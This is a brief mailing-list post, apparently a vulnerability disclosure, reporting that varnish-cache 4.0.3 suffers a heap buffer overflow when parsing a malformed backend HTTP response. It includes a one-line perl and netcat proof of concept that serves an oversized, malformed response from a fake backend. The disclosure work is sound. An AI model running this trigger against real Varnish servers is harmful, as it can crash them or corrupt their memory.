Posted by Marek Kroemeke on Mar 10

Hi there,

Latest varnish-cache 4.0.3 (https://www.varnish-cache.org/) seem to have a problem with parsing HTTP responses from
backend.
The following example response will trigger a heap buffer overflow :

— cut —
perl -e ‘print “HTTP/1.1 200 OKrnContent-Length: dupa” . “n” x 15855 . “A” x 10000 . “n” ‘ | nc -l 1098
— cut —

assuming your config uses localhost:1098 as backend.

meh…